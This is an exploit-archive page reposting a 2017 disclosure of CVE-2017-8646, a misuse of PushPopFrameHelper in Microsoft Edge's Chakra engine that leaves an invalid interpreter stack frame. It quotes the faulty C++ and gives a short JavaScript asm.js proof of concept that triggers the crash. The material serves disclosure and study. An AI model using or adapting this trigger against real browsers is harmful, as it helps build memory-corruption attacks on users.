Home / exploits Microsoft Edge Chakra PushPopFrameHelper Incorrect Usage
Posted on 17 August 2017
Microsoft Edge: Chakra: Incorrect usage of PushPopFrameHelper in InterpreterStackFrame::ProcessLinkFailedAsmJsModule CVE-2017-8646 PushPopFrameHelper is a class that pushes the current stack frame object in its constructor and pops it in the destructor. So it should be used like "PushPopFrameHelper holder(...)", but InterpreterStackFrame::ProcessLinkFailedAsmJsModule uses it like a function. Var InterpreterStackFrame::ProcessLinkFailedAsmJsModule() { ... PushPopFrameHelper(newInstance, _ReturnAddress(), _AddressOfReturnAddress()); ... } It pushes "newInstance" and immediately pop it. The PoC will crash in the following code. void BailOutRecord::ScheduleLoopBodyCodeGen(Js::ScriptFunction * function, Js::ScriptFunction * innerMostInlinee, BailOutRecord const * bailOutRecord, IR::BailOutKind bailOutKind) { ... Js::InterpreterStackFrame * interpreterFrame = executeFunction->GetScriptContext()->GetThreadContext()->GetLeafInterpreterFrame(); <<-- Invalid stack frame object loopHeader = executeFunction->GetLoopHeader(interpreterFrame->GetCurrentLoopNum()); <<-- interpreterFrame->GetCurrentLoopNum() == -1 ... } PoC: function asmModule() { 'use asm'; let a = [1, 2, 3, 4]; for (let i = 0; i < 0x100000; i++) { // JIT a[0] = 1; if (i === 0x30000) { a[0] = {}; // the array type changed, bailout!! } } function f(v) { v = v | 0; return v | 0; } return f; } asmModule(1); This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: lokihardt
